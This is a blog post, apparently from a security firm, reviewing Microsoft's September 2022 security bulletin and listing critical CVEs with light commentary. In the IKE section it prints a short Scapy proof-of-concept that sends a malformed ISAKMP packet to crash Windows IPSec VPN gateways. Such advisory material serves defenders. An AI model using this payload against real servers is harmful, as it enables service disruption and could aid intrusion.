20 September 2022 CVE Vlad

Microsoft Security Bulletin of September 2022

This month Microsoft’s security bulletin is quite intense, even if it does not contain anything that makes world security panic… but maybe😉

Remote code execution on VPN protocol IKE / CVE-2022-34721 and CVE-2022-34722

If you have a Windows server that acts as an IPSec VPN gateway, then it is vulnerable to 2 remote code executions, allowing full control, without authentication.

If in addition this server is exposed on the Internet… I think you’re going to have a bad weekend 😉.

CVSS score: 9.8/10.

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34721https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34722

As a bonus, here is a non-stability exploit that only crashes the service but within a few hours the exploit will be stability and exploited in the wild 😉: https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721

The exploit source code :

from scapy.all import *
from scapy.contrib.ikev2 import *
from scapy.layers.isakmp import *

import socket, time
target = ("192.168.159.134", 500)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")
sock.sendto(raw(pkt), target)
Please do not launch it on production servers 😄

Local privilege escalation with the log API (Windows Common Log File System / CLFS) / CVE-2022-37969

This API is accessible by any application willing to log things and this vulnerability allows to elevate its privileges but only if the attacker already has a first execution of code or partial takeover of the target (or is a teasing user 😅).

The particularity of this vulnerability is that it has been discovered by several security companies (Mandiant, Zscaler, Crowdstrike) as being exploited in the wild. Understand: customers of theirs have been hacked and this vulnerability has been used by attackers to advance attacks or directly into their malware.

Remote code execution on IPv6 / CVE-2022-34718

This one is funny because if you have a Windows system with IPv6 enabled (which is the case by default), then it is possible to send you a specially formatted network packet resulting in code execution, remotely, without authentication. And since IPv6 is at the kernel level, it’s a total takeover 🎉.

CVSS score: 9.8/10.

Unless I’m mistaken, this is a routable packet, so the vulnerability looks like it could be exploited on the Internet. Afterwards, understand Microsoft, IPv6 is recent, it has only been supported by Microsoft for 20 years 😜! (Since Windows XP and especially XP SP1) https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718

Other vulnerabilities

There are still plenty of vulnerabilities, some of which are:

  • Code executions in Visual Studio…protect your developers 👍(CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827);
  • Privilege escalations from Exchange (mail);
  • Nice remote, unauthenticated code execution on Windows servers serving as a “PPP” VPN gateway (CVE-2022-30133);
  • Remote code execution without authentication on the Bluetooth driver 😨 . Disable your computer’s Bluetooth by default, it’s a good practice (CVE-2022-30144);
  • Unauthenticated remote code execution on the NFS file sharing service 😱 (CVE-2022-34715);
  • Remote code execution without authentication on the SMB file sharing service, both client and server 😲 (CVE-2022-35804);
  • Bypassing Excel restrictions that can be used in phishing to result in code execution (CVE-2022-33631);
  • A local elevation of privileges from the Windows Fax service. Yes yes, in 2022, the Fax… (CVE-2022-34690);
  • More vulnerabilities in the print spooler. I lost count but we must have passed the twentieth 🤯 (CVE-2022-35755, CVE-2022-35793);
  • A virtual machine breakout on Hyper-V (CVE-2022-34696);
  • A Credential Guard bypass, meant to protect your in-memory passwords and password digests (CVE-2022-34709);
  • A bypass of Windows Hello authentication, supposed to keep your computer locked 🤦‍♂️ (CVE-2022-35797);
  • Bypasses of Secure Boot, supposed to protect the boot of your computer (CVE-2022-34301 and CVE-2022-34303);
  • And finally, 16 vulnerabilities in the Chromium-Edge browser.

Finally

Finally… there are some pretty critical vulnerabilities that need to be patched quickly 😉.

Last funny point, with this bulletin, Microsoft corrects its thousandth flaw of the year, youhou.. bravo… champagne 🍾.

It’s a very nice (ironic) anniversary to celebrate the official publication of the “Cyber Resilience Act”. which will require publishers to provide security assistance, security updates and a guarantee that digital products comply with cybersecurity requirements throughout their lifecycle. But that’s another topic we’ll talk about again😉: https://twitter.com/MaliciaRogue/status/1570366397737222144

Good luck 👍

Our latest news

See more news